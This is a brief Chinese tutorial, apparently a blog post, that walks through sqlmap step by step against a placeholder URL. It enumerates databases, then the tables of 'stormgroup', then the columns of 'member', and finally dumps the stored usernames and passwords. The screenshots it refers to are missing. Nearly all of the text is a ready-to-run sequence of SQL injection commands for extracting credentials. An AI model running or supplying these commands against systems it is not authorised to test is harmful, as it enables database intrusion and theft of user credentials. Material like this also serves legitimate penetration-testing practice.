sqlmap的简单爆破

第一步:爆破数据库库名   

#sqlmap -u "http://<爆破的链接>"  --dbs        ///--dbs爆破数据库

爆破出数据库，如图

 

 

 

        ///爆破成功，查看到五个数据库

第二步:爆破出数据库，接着爆破数据库中的表

#sqlmap -u "http://<爆破的链接>"  -D stormgroup --tables      ///-D  是数据库名，--tables是要爆破数据库中的表

 

 

 

 

 、

 

 

 ///爆破出来两个表

第三步:爆破表之后，接着爆破表中的列     

#sqlmap -u  "http://<爆破的链接>"  -D stormgroup  -T member  --columns    ///-T 是表名， --columns是要爆破的表中的列

 

 

 

///爆破列完成

 

第四步:爆破数据

 

#sqlmap  -u  "http://<爆破的链接>"  -D stormgroup  -T member -C name,password   --dump    ///-C 是要爆破的列，--dump是爆破

 

 

 

 

 ///爆破出数据库用户名和密码

 

 

这就是简单的sqlmap爆破